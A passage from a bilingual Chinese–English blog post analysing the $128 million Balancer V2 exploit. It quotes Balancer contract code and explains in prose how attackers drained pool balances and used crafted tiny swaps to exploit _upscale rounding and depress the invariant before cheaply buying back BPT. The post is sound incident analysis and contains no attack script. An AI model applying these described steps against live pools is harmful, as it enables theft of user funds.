流入之后 <strong>tokenIn 的新余额 (即$x=B_x + Amount_{in}$</strong>，而这个$Amount_{in}$就是 <code>_calcInGivenOut</code> 最终要求的值)。<strong>待计算的值</strong>。</li><li>$S_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总和。</li><li>$P_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总积。</li></ul><p>这样，在计算出 tokenIn 的预期新余额之后，减去当前余额就能得到期望用户输入的 tokenIn 代币数 $Amount_{in}$。</p><p><strong>那么 BPT 的价格该如何计算呢？</strong> 看得出来 <strong>BPT 的价格与不变量 D 是正相关</strong>的，符合 $P_{BPT} = \frac{D}{S_{BPT}}$，其中$P_{BPT}$ 为 BPT 的价格，$S_{BPT}$ 为 BPT 的总供应量。但是要注意，虽然 D 名为不变量，但它并不代表是一成不变的，详见底下的代码注释，这里不再展开。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 
class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed</span></span><br><span class="line"><span class="comment"> * point number. It is simply the ratio of the invariant to the BPT supply.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the</span></span><br><span class="line"><span class="comment"> * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,</span></span><br><span class="line"><span class="comment"> * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or</span></span><br><span class="line"><span class="comment"> * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens</span></span><br><span class="line"><span class="comment"> * in the pool do not lose value*.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">getRate</span>(<span class="params"></span>) external view virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// We need to compute the current invariant and actual total supply. 
The latter includes protocol fees that have</span></span><br><span class="line">    <span class="comment">// accrued but are not yet minted: in calculating these we&#x27;ll actually end up fetching most of the data we need</span></span><br><span class="line">    <span class="comment">// for the invariant.</span></span><br><span class="line"></span><br><span class="line">    (</span><br><span class="line">        uint256[] memory balances,</span><br><span class="line">        uint256 virtualSupply,</span><br><span class="line">        uint256 protocolFeeAmount,</span><br><span class="line">        uint256 lastJoinExitAmp,</span><br><span class="line">        uint256 currentInvariantWithLastJoinExitAmp</span><br><span class="line">    ) = <span class="title function_">_getSupplyAndFeesData</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual</span></span><br><span class="line">    <span class="comment">// supply to get the actual supply.</span></span><br><span class="line">    uint256 actualTotalSupply = virtualSupply.<span class="title function_">add</span>(protocolFeeAmount);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// All that&#x27;s missing now is the invariant. 
We have the balances required to calculate it already, but still</span></span><br><span class="line">    <span class="comment">// need the current amplification factor.</span></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// It turns out that the process for due protocol fee calculation involves computing the current invariant,</span></span><br><span class="line">    <span class="comment">// except using the amplification factor at the last join or exit. This would typically not be terribly useful,</span></span><br><span class="line">    <span class="comment">// but since the amplification factor only changes rarely there is high probability of its current value being</span></span><br><span class="line">    <span class="comment">// the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant</span></span><br><span class="line">    <span class="comment">// computation altogether.</span></span><br><span class="line">    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)</span><br><span class="line">        ? currentInvariantWithLastJoinExitAmp</span><br><span class="line">        : <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// With the current invariant and actual total supply, we can compute the rate as a fixed-point number.</span></span><br><span class="line">    <span class="keyword">return</span> currentInvariant.<span class="title function_">divDown</span>(actualTotalSupply);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-攻击流程">3. 
攻击流程</h3><p>在第一小节里我们提到了如果传入了一个极小值给 _upscale 函数，那么其计算结果会出现较大的精度损失，但我们仍然还<strong>没搞清楚是如何通过这个几 wei 的极小值来窃取大额资金</strong>的。第二小节里我们详细了解了 Stable Pool 的不变量公式以及 BPT 价格的计算方式。</p><p>回顾一下：</p><ol><li>Stable Pool 的数学模型表现为常和与常积的结合，即在锚定价格附近表现为 x + y = k，<strong>偏离锚定价格较远的位置则表现为 x * y = k</strong>。</li><li>不变量 D 的计算是通过各个 token 的 balance 来得到的，那么<strong>不变量 D 一定和各个 token 的 balance 呈正相关</strong>。这个很容易证明，当有 LP 注入流动性的时候 token balance 增加，那么 D 也要增加以对应新增发的 BPT，反之如果 LP 撤离流动性则 token balance 降低，D 也应该随之变小。</li><li><strong>BPT 价格是由不变量 D 和当前总供应量得到</strong>。在总供应量不变的情况下如果能通过漏洞把 D 降低那么就能以比正常价格低的价格来兑换 BPT。</li></ol><p>那么攻击思路就开始逐渐清晰了：<strong>在每次 Swap 时，不变量 D 的计算都是由 token balance 来计算得到。如果能通过这种细微的 token balance 计算的精度丢失，使得不变量 D 的计算被压小（在 BPT 总供应量不变的前提下），那么攻击者就可以以较低的价格来购买 BPT，因为 BPT 价格受到不变量 D 的直接影响</strong>。</p><p><a href="https://app.blocksec.com/explorer/tx/arbitrum/0x7da32ebc615d0f29a24cacf9d18254bea3a2c730084c690ee40238b1d8b55773">Arbitrum 上的示例攻击交易</a>展示了攻击的全流程，我们可以发现攻击者正是通过 _upscale 函数精度损失，使得 D 的计算偏离正常值，进而影响 BPT 价格来进行攻击。具体来说，攻击的流程是这样的。</p><ol><li><p><strong>流动性操纵</strong>。Balancer batchSwap 允许临时借用内部余额，因此攻击者首先借用了 Balancer 中该 Pool 的 BPT，进而使用这些 BPT 去换取底层的 rETH/cbETH/wstETH 等资产代币。使得这些本来余额为 1e18 数量级的代币，在经过大量兑换之后池子里只剩下 1e11 级别的数量：</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image.png" alt="image.png"></p><p>上图中 TokenIn 为 <code>wstETH/rETH/cbETH</code> 的这个其实就是该池子的 BPT（因为 BPT 的地址就是该池子的地址）。从图上可以看到从上到下每次兑换底层资产的数量级依次递减，直到最后 swap 的数量低于 100wei。从余额变动来看，最开始进行 swap 时代币的数量分别为：</p><ul><li><strong>cbETH: 385e18</strong> (385,331,897,945,415,101,145)</li><li><strong>BPT: 2.45e18</strong> + 2^111 (2,596,148,429,267,416,263,499,288,948,276,786)</li><li><strong>wstETH: 36.4e18</strong> (36,378,350,238,858,588,950)</li><li><strong>rETH: 41.3e18</strong> (41,301,528,246,890,260,702)</li></ul><blockquote><p>注：BPT 余额中 2^111 部分为 <code>_PREMINTED_TOKEN_BALANCE</code>，详见代码。</p></blockquote><p>而在完成流动性操纵之后最终的代币数量分别为：</p><ul><li><strong>cbETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>BPT: 501.96e18</strong> + 2^111 
(2,596,148,429,267,915,775,463,860,923,420,341)</li><li><strong>wstETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>rETH: 1.00e11</strong> (100,000,000,000)</li></ul></li><li><p>通过舍入漏洞频繁压低不变量 D。这一步骤只涉及到 wstETH/cbETH 交易。攻击者通过重复多次以下 swap 步骤来达到目的：</p><ol><li>wstETH→cbETH: 这一步将耗尽 wstETH 流动性，使得流动性从较高的 1e11 降低为 9 这个临界值。</li><li><strong>wstETH→cbETH: 这一步使用精心构建的 amount = 8， 触发 upscale 的精度损失。</strong> 此时 cbETH 的 token rate 为 1.114。因此在计算不变量 D 之前，upscale 会计算 <code>balance(8) * rate(1.114) = value(8.912)</code> 并截断为 <strong>8</strong>。这样一来，在计算不变量 D 时，由于使用的 token balance 为截断后的 value，因此所计算出来的 D 的值将会被恶意下压。</li><li>cbETH→wstETH: 在完成上一步的步骤将 D 向下压缩之后，这一步的 swap 只是将 wstETH 的流动性从 1 恢复为例如 5642 这种较高值，以准备下一次执行 a 步骤。</li></ol><p><img src="/2025/11/balancer-128m-exploit-analysis/image%201.png" alt="image.png"></p></li><li><p>由于已经通过多次舍入攻击把不变量 D 压的很小，因此攻击者可以以较低价格来回购 BPT，用以偿还从 Vault 的 batchSwap 里借用的内部余额。而 BPT 的前后价格差就是攻击者窃取金额的关键。下图展示了攻击者花费底层代币 cbETH/wstETH/rETH 回购 BPT 的交易过程，这里攻击者每次回购 BPT 的数量呈指数级上升，用于快速回购回最开始从 Vault 借入的用于枯竭掉 Pool 流动性所花费的 BPT。</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image%202.png" alt="image.png"></p></li></ol><h2 id="四、参考链接">四、参考链接</h2><ol><li><a href="https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/">https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/</a></li><li><a href="https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437">https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437</a></li><li><a href="https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit">https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit</a></li><li><a href="https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw">https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw</a></li><li><a href="https://x.com/Balancer/status/1986104426667401241">https://x.com/Balancer/status/1986104426667401241</a></li></ol></div><div id="content-en" class="lang-content lang-content-en" 
style="display: none;"><h2 id="I-Introduction">I. Introduction</h2><p><strong>On November 3, 2025, attackers exploited arithmetic precision loss in Balancer pool invariant calculations, stealing $128 million from six blockchain networks in less than 30 minutes.</strong> I found this attack very interesting, but most existing write-ups cover only a narrow slice of the technical details, such as the precision loss in the _upscaleArray logic or only one or two adjacent layers of the call chain, which is not very friendly to readers who are not yet familiar with Balancer’s internals. I therefore wanted to organize all the relevant details in one place and take the opportunity to learn the Balancer protocol.</p><h2 id="II-Balancer-Internal">II. Balancer Internal</h2><p>In a nutshell: Balancer is a DeFi liquidity pool framework centered around <strong>Automated Market Makers (AMM)</strong>. If that sounds like it says nothing at all, don’t worry; let’s work through it step by step.</p><h3 id="1-What-is-an-AMM">1. What is an AMM</h3><p>What is an Automated Market Maker (AMM)? Let’s first understand what a market maker is. <strong>A Market Maker is a role that provides liquidity</strong>. For example, in stock trading, a large gap between the bid and ask prices of an asset is unfavorable for users who want to buy or sell: a wide spread prevents them from trading at a suitable price and costs them extra capital. Market makers provide liquidity by frequently placing orders in the order book, which narrows the gap between buy and sell prices. If you’ve traded US stock options, you’ll know this well: options are inherently illiquid, so most of the liquidity in the order book is provided by market makers.</p><p>For cryptocurrencies, similar problems arise in currency conversion. If users want to trade large amounts of their tokens, they need to find a place that can handle all their trades. 
The well-known Uniswap V2 is a classic example. It holds large amounts of TokenA/TokenB pairs and calculates token exchange prices by maintaining the <code>x * y = k</code> invariant. For example, if Uniswap’s k = 20,000 and currently holds 1000 USDC and 20 ETH, then the ETH/USDC exchange rate is 50. If the token amounts in Uniswap change to 2000 USDC and 10 ETH (note that k remains unchanged), then the ETH/USDC exchange rate becomes 200. You can see that trading venues like Uniswap automatically adjust their trading prices based on mathematical formula calculations, hence they are automated market makers. <strong>An Automated Market Maker is a role that can both automatically adjust prices based on market conditions and provide sufficient token liquidity to meet trading needs</strong>.</p><h3 id="2-Balancer-Components">2. Balancer Components</h3><p>The <a href="https://docs-v2.balancer.fi/concepts/pools/">Balancer V2 documentation</a> describes that Balancer mainly consists of two parts: Vault and Pools. Vault and Pools have a one-to-many relationship, so if users are involved in trading operations between multiple tokens, they only need to update accounting in the Vault, reducing redundant transfers and lowering gas costs.</p><p><strong>Vault</strong></p><p>The Vault (pkg/vault/contracts/Vault.sol) is the core of Balancer. It <strong>holds</strong> and <strong>manages</strong> all tokens in each Balancer pool and is also the entry point for most Balancer operations (swaps / joins / exits). However, it’s important to note that while the Vault holds tokens and maintains accounting, it does not perform specific fund management (for example, logic such as maintaining AMM invariants is not done in the vault). This logic is handled in Pools.</p><p><strong>Pools</strong></p><p>There are many different types of pools in Balancer. 
Here are a few simple or commonly used ones:</p><ul><li><strong>Linear Pool</strong>: Uses known and stable exchange rates to allow swapping between base assets and their wrapped yield tokens. For example, in Aave, stablecoin DAI and aDAI (which represents deposits and continuously accrues interest after depositing DAI into Aave) can be efficiently swapped through a Linear Pool.</li><li><strong>Weighted Pool</strong>: An extended version of the classic constant product market-making model (x · y = k) popularized by Uniswap V1.</li><li><strong>Composable Stable Pools</strong>: Liquidity pools designed for a set of assets that are highly correlated in value and expected to exchange stably at near 1:1 ratios or through known exchange rates. For example, stablecoins like USDC, USDT, and DAI have minimal price volatility against each other, which makes them well suited to a low-slippage stable curve.</li></ul><p>Regarding <strong>Composable Stable Pools</strong>, note the following:</p><ol><li>Its use case differs from that of Linear Pool: Composable Stable Pool handles exchanges between “<strong>multiple mutually equivalent stable assets</strong>”, while Linear Pool handles exchanges between “<strong>base assets and their yield tokens</strong>”. The two have significantly different mathematical structures and application scenarios.</li><li>Composable means that the pool’s BPT (Balancer Pool Token, the ERC20 share proof that liquidity providers receive after depositing assets into the pool) <strong>can itself participate as a composable asset in the construction of other pools</strong>. In other words, the pool’s LP tokens can be nested into higher-level pools like regular tokens, allowing different pools to freely combine, reference each other, and together form larger-scale, more capital-efficient liquidity structures. 
Although Linear Pool also registers its BPT to the Vault, these BPTs may not be used as composable assets to build other Pools.</li></ol><h3 id="3-Balancer-Interaction-Flow">3. Balancer Interaction Flow</h3><p>Here we use the Vault + Composable Stable Pools combination as an example to introduce some of Balancer’s interaction flows.</p><p><strong>Creating Composable Stable Pool Contracts</strong></p><p>Let’s first look at what interaction flow occurs between the vault and pool when creating a pool, and what state variables are involved:</p><ol><li><p>To create a new <strong>Composable Stable Pool</strong>, users can freely call the create function of the ComposableStablePoolFactory contract (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol) to create a new ComposableStablePool contract.</p></li><li><p>The ComposableStablePool constructor will then automatically call vault.registerPool and vault.registerTokens to register this pool and related tokens into the vault. Note that the related tokens here include not only the underlying assets specified during registration but also the pool address itself (because the pool is its own BPT).</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="title function_">constructor</span>(<span class="params">NewPoolParams memory params</span>)</span><br><span class="line">    <span class="title class_">BasePool</span>(</span><br><span class="line">        params.<span class="property">vault</span>,</span><br><span class="line">        <span class="title class_">IVault</span>.<span class="property">PoolSpecialization</span>.<span class="property">GENERAL</span>,</span><br><span class="line">        params.<span class="property">name</span>,</span><br><span class="line">        params.<span class="property">symbol</span>,</span><br><span class="line">        <span class="title function_">_insertSorted</span>(params.<span class="property">tokens</span>, <span class="title class_">IERC20</span>(<span class="variable language_">this</span>)), <span class="comment">// &lt;------</span></span><br><span class="line">        <span class="keyword">new</span> address[](params.<span class="property">tokens</span>.<span class="property">length</span> + <span class="number">1</span>), <span class="comment">// &lt;------</span></span><br><span class="line">        params.<span class="property">swapFeePercentage</span>,</span><br><span class="line">        params.<span 
class="property">pauseWindowDuration</span>,</span><br><span class="line">        params.<span class="property">bufferPeriodDuration</span>,</span><br><span class="line">        params.<span class="property">owner</span></span><br><span class="line">    )</span><br><span class="line">    <span class="title class_">StablePoolAmplification</span>(params.<span class="property">amplificationParameter</span>)</span><br><span class="line">    <span class="title class_">ComposableStablePoolStorage</span>(<span class="title function_">_extractStorageParams</span>(params))</span><br><span class="line">    <span class="title class_">ComposableStablePoolRates</span>(<span class="title function_">_extractRatesParams</span>(params))</span><br><span class="line">    <span class="title class_">ProtocolFeeCache</span>(</span><br><span class="line">        params.<span class="property">protocolFeeProvider</span>,</span><br><span class="line">        <span class="title class_">ProviderFeeIDs</span>(&#123; <span class="attr">swap</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">SWAP</span>, <span class="attr">yield</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">YIELD</span>, <span class="attr">aum</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">AUM</span> &#125;)</span><br><span class="line">    )</span><br><span class="line">&#123;</span><br><span class="line">    _version = params.<span class="property">version</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    IVault vault,</span></span><br><span class="line"><span class="params">    
IVault.PoolSpecialization specialization,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) private <span class="title function_">returns</span> (bytes32) &#123;</span><br><span class="line">    bytes32 poolId = vault.<span class="title function_">registerPool</span>(specialization);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We don&#x27;t need to check that tokens and assetManagers have the same length, since the Vault already performs</span></span><br><span class="line">    <span class="comment">// that check.</span></span><br><span class="line">    vault.<span class="title function_">registerTokens</span>(poolId, tokens, assetManagers);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Let’s mention <strong>PoolSpecialization</strong> here. It determines the form of the callback interface that the Vault uses when calling the pool for swaps, which in turn affects the pool’s gas costs and supported functionality:</p><ul><li>General type is the most flexible, suitable for pools that need access to all token balances and complex mathematical logic.</li><li>Minimal Swap Info reduces callback data while maintaining functionality, commonly used for AMMs like Weighted Pool that don’t need full state.</li><li>Two Token further restricts the pool to contain only two assets in exchange for the lowest swap gas cost.</li></ul><p>Different types of pools choose appropriate specializations to balance functionality and performance based on their invariant calculation requirements and expected swap complexity. Each pool hardcodes the PoolSpecialization parameter in its constructor. 
In ComposableStablePool, PoolSpecialization is set to <strong>GENERAL</strong>.</p></li><li><p>When the Vault receives function calls from a General Pool, it performs some calculations and state updates. One is in the registerPool function, where the vault calculates a unique pool ID for this pool and stores it in the _isPoolRegistered variable:</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolRegistry.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerPool</span>(<span class="params">PoolSpecialization specialization</span>)</span><br><span class="line">    external</span><br><span class="line">    override</span><br><span class="line">    nonReentrant</span><br><span class="line">    whenNotPaused</span><br><span class="line">    <span class="title function_">returns</span> (bytes32)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Each Pool is assigned a unique ID based on an incrementing nonce. 
This assumes there will never be more than</span></span><br><span class="line">    <span class="comment">// 2**80 Pools, and the nonce will not overflow.</span></span><br><span class="line"></span><br><span class="line">    bytes32 poolId = <span class="title function_">_toPoolId</span>(msg.<span class="property">sender</span>, specialization, <span class="title function_">uint80</span>(_nextPoolNonce));</span><br><span class="line"></span><br><span class="line">    <span class="title function_">_require</span>(!_isPoolRegistered[poolId], <span class="title class_">Errors</span>.<span class="property">INVALID_POOL_ID</span>); <span class="comment">// Should never happen as Pool IDs are unique.</span></span><br><span class="line">    _isPoolRegistered[poolId] = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    _nextPoolNonce += <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note that msg.sender is the pool&#x27;s contract</span></span><br><span class="line">    emit <span class="title class_">PoolRegistered</span>(poolId, msg.<span class="property">sender</span>, specialization);</span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The other is in the registerTokens function, which populates both <code>_poolAssetManagers</code> and <code>_generalPoolsBalances</code>. Both are keyed by <code>&lt;poolId, token&gt;</code>. The former records the Asset Manager address that is allowed to deposit, withdraw, or update the balance of a token within the Pool, while the latter records the <strong>balance state</strong> of a token in the Pool from the vault’s perspective. 
So it is indeed the vault that tracks how much of each token the Pool holds, which is also what makes swaps convenient to process.</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolTokens.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span 
class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) external override nonReentrant whenNotPaused <span class="title function_">onlyPool</span>(<span class="params">poolId</span>) &#123;</span><br><span class="line">    <span class="title class_">InputHelpers</span>.<span class="title function_">ensureInputLengthMatch</span>(tokens.<span class="property">length</span>, assetManagers.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Validates token addresses and assigns Asset Managers</span></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="title class_">IERC20</span> token = tokens[i];</span><br><span class="line">        <span class="title function_">_require</span>(token != <span class="title class_">IERC20</span>(<span class="number">0</span>), <span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line"></span><br><span class="line">        _poolAssetManagers[poolId][token] = assetManagers[i];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title class_">PoolSpecialization</span> specialization = <span class="title function_">_getPoolSpecialization</span>(poolId);</span><br><span class="line">    <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">TWO_TOKEN</span>) &#123;</span><br><span class="line">        <span class="title function_">_require</span>(tokens.<span class="property">length</span> == <span class="number">2</span>, <span class="title class_">Errors</span>.<span class="property">TOKENS_LENGTH_MUST_BE_2</span>);</span><br><span 
class="line">        <span class="title function_">_registerTwoTokenPoolTokens</span>(poolId, tokens[<span class="number">0</span>], tokens[<span class="number">1</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">MINIMAL_SWAP_INFO</span>) &#123;</span><br><span class="line">        <span class="title function_">_registerMinimalSwapInfoPoolTokens</span>(poolId, tokens);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// PoolSpecialization.GENERAL</span></span><br><span class="line">        <span class="title function_">_registerGeneralPoolTokens</span>(poolId, tokens); <span class="comment">// &lt;-------</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    emit <span class="title class_">TokensRegistered</span>(poolId, tokens, assetManagers);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/vault/contracts/balances/GeneralPoolsBalance.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerGeneralPoolTokens</span>(<span class="params">bytes32 poolId, IERC20[] memory tokens</span>) internal &#123;</span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[poolId];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="comment">// EnumerableMaps require an explicit initial value when creating a key-value pair: we use 
zero, the same</span></span><br><span class="line">        <span class="comment">// value that is found in uninitialized storage, which corresponds to an empty balance.</span></span><br><span class="line">        bool added = poolBalances.<span class="title function_">set</span>(tokens[i], <span class="number">0</span>);</span><br><span class="line">        <span class="title function_">_require</span>(added, <span class="title class_">Errors</span>.<span class="property">TOKEN_ALREADY_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This is a good place to describe how the vault stores <code>Pool Balances</code>. For each token of a pool, the balance stored in <code>_generalPoolsBalances</code> is a single bytes32 value that packs three fields:</p><ul><li><code>cash</code> (112 bits): the amount of tokens currently held in the Vault for this Pool</li><li><code>managed</code> (112 bits): the amount of tokens withdrawn from the Vault by the Pool’s Asset Manager and held externally</li><li><code>lastChangeBlock</code> (32 bits): the block number of the last balance change, used to guard against sandwich attacks</li></ul><p>The core purpose of this design is to let liquidity earn higher returns while the AMM keeps operating normally. In the early Uniswap model, maintaining x·y = k meant that most liquidity had to stay locked inside the contract, so it could not be invested externally to generate additional returns. Balancer’s architecture allows Asset Managers to withdraw some funds from the Vault for lending, investment, or other yield strategies. 
The Pool’s total balance is still <code>total = cash + managed</code>, but the managed portion can be put to work to earn additional returns; the <code>cash</code> amount stored in the Vault is updated only when events such as a swap, join, or exit occur. This preserves AMM availability while improving overall capital efficiency.</p></li></ol><p><strong>Adding Liquidity</strong></p><p>When a Liquidity Provider (LP) wants to add liquidity to a Pool, they call the joinPool function on the vault, which in turn calls the specific pool’s onJoinPool function (to remove liquidity, the corresponding pair is vault.exitPool and pool.onExitPool). Below is the code for the onJoinPool / onExitPool functions. Both are inherited by every type of Pool: <strong>each type of Pool implements its own hook functions such as _onInitializePool / _onJoinPool / _onExitPool to calculate the amounts of funds flowing in and out, but BPT minting and burning happens here</strong>:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
